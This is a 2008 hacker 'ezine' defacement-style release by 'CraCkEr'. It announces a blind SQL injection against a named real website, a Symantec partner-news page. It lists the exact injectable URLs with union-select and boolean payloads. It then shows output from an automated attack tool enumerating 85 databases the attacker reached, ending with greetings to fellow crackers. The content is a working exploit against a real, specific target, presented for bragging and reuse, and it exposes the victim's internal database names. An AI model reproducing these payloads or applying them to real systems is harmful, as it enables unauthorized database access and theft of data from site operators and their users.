┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ [ EZINE ] ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Website : symantec.com │ │ Famous Sites Can Be │ │ Vuln Type: Blind SQL Injection │ │ │ │ Method : GET │ │ Olso Vulned │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database access │ │ │ │ ────────────────────────────────────┘ └─────────────────────────────────── │ │ DALnet #crackers ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ [+] Remote SQL http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3-- [+] Blind SQL http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1 http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0 [+] Text Change Bedriftsfordelene ved sosiale nettverk [+] Attack Results [+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found! [+] Showing all databases current user has access too! [+] 18:00:05 [+] Number of Rows: 85 [0]: hv_kompaktseminar_2008 [1]: 3ds_statistics [2]: channelevent [3]: cpu_expertenforum_2008 [4]: cpu_xmas_2007 [5]: db_bt [6]: db_bt2008 [7]: db_elearning [8]: db_elearning2 [9]: db_farbreiz [10]: db_hpcd [11]: db_jsdesk [12]: db_pepper_oktoberfest2008 [13]: db_ship [14]: db_shop [15]: db_shrek [16]: db_shrek_handover [17]: db_symantec [18]: db_wordstock [19]: demo_3ds_statistics [20]: demo_ajaxfb [21]: demo_bettgefluester [22]: demo_compel_bs [23]: demo_compel_tec [24]: demo_db_elearning [25]: demo_hp_smb_portal [26]: demo_hpsmartportal [27]: demo_hpsmartportal_at [28]: demo_hpsmartportal_at_ch [29]: demo_hpsmartportal_ch [30]: demo_hpsmartportal_de [31]: demo_hpsmartportal_nl [32]: demo_hpsmartportal_nl_int [33]: demo_iqpower [34]: demo_kanalm [35]: demo_panadress [36]: demo_panadress_old [37]: demo_pepper_joomla [38]: demo_pepper_website [39]: demo_pepperglobal [40]: demo_pepperglobal_new [41]: demo_phpproject [42]: demo_preferred [43]: demo_preferred_demo [44]: demo_symantec [45]: demo_test [46]: demo_zukunftspodium [47]: hp_elearning [48]: hp_elearning_2 [49]: hp_mobiles-rechenzentrum [50]: hp_mobiles-rechenzentrum_handover [51]: hp_smb_portal [52]: hv_management_2007 [53]: hv_management_2008 [54]: linde_ltip_08 [55]: linde_mtip_07 [56]: linde_tilia_edm [57]: mysql [58]: oktoberfest2007 [59]: oktoberfest_2008 [60]: opengeodb [61]: partnernews_sep09 [62]: pepperglobal [63]: pepperglobal_new [64]: pepperglobal_statistics [65]: phpmyadmin [66]: preferred [67]: preferred_handover [68]: remoteshell [69]: robertdill [70]: symantec_ddc_2 [71]: symantec_partnernews [72]: symantec_partnernews_0108 [73]: symantec_partnernews_0208 [74]: symantec_partnernews_0308 [75]: symantec_partnernews_0408 [76]: symantec_partnernews_0508 [77]: symantec_partnernews_0608 [78]: symantec_partnernews_0708 [79]: symantec_partnernews_0908 [80]: symantec_partnernews_handover [81]: symantec_wordstock [82]: tenovis_wcp_3_0 [83]: transcat_statistics [84]: webcast_portal_3_3 [-] 00:58:04 [-] Total URL Requests 10602 [-] Done └────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2008 ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘